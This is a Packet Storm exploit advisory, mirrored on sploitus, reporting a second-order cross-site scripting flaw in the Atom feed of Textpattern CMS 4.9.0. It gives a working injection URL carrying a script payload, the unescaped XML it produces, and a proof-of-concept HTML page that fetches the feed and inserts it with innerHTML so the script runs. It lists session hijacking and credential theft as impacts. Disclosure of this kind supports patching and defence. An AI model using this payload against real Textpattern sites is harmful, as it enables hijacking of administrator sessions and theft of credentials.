Share
## https://sploitus.com/exploit?id=PACKETSTORM:216241
=============================================================================================================================================
    | # Title     : Textpattern 4.9.0 Second-Order XSS via Atom Feed Injection                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://textpattern.com/                                                                                                    |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213262/
    
    [+] Summary    : A Second-Order Cross-Site Scripting (XSS) vulnerability exists in Textpattern CMS version 4.9.0 due to improper sanitization and contextual encoding 
                     of user-supplied input embedded within Atom feed XML elements.
                     User-controlled parameters (such as category) are reflected into sensitive Atom fields including <id> and <link href> without proper XML escaping. 
    				 While the injected payload does not execute directly in modern browsers (due to XML context), it executes when the feed is consumed 
    				 by vulnerable HTML-based feed readers, admin dashboards, or CMS aggregators, resulting in JavaScript execution in a trusted context.
                     This vulnerability enables Supply-Chain XSS targeting administrative users and trusted systems.
    
    [+] Affected Product
    
    Product: Textpattern CMS
    
    Version: 4.9.0
    
    Component: Atom Feed Generator (/atom/)
    
    Attack Surface: Feed consumers (Admin panels, RSS/Atom readers)
    
    Vulnerability Type
    
    Second-Order Cross-Site Scripting (XSS)
    
    Feed Injection / Trusted Content Injection
    
    CWE / CAPEC Classification
    
    CWE-79: Improper Neutralization of Input During Web Page Generation
    
    CWE-116: Improper Encoding or Escaping of Output
    
    CAPEC-63: Cross-Site Scripting (Stored Injection)
    
    [+] Technical Details :
    
    The Atom feed endpoint reflects untrusted input directly into XML nodes:
    
    <id>
    
    <link href>
    
    Example Injection Vector
    /atom/?section=articles&category=meaningful-labor'"()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>
    
    Resulting Atom Fragment
    <id>
    tag:release-demo.textpattern.co,2005:.../articles/meaningful-labor'"()&%<acx>
    <ScRiPt>prompt(925482)</ScRiPt>
    </id>
    
    The payload is preserved without XML escaping, confirming an injection vulnerability.
    
    Exploitation Scenario (Second-Order)
    
    Attacker injects a malicious payload via Atom feed parameters.
    
    Textpattern reflects the payload into the generated Atom XML.
    
    An administrator or system consumes the feed using:
    
    Admin feed preview panels
    
    CMS importers
    
    Custom dashboards
    
    The feed content is inserted into the DOM using unsafe methods such as:
    
    element.innerHTML = feedContent;
    
    JavaScript payload executes in the context of the trusted application.
    
    [+] PoC :
    
    <!DOCTYPE html>
    <html>
    <body>
    <div id="feed"></div>
    <script>
    fetch("https://127.0.0.1/release-demo.textpattern.co/atom/?section=articles&category=meaningful-labor'%22()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>")
    .then(r => r.text())
    .then(d => document.getElementById("feed").innerHTML = d);
    </script>
    </body>
    </html>
    
    [+] Result : prompt(925482)
    
    Confirms execution
    No false positives
    Demonstrates second-order exploitation
    
    [+] Impact :
    
    Arbitrary JavaScript execution in trusted admin interfaces
    
    Session hijacking
    
    Credential theft
    
    CSRF token extraction
    
    Supply-chain compromise via trusted feeds
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================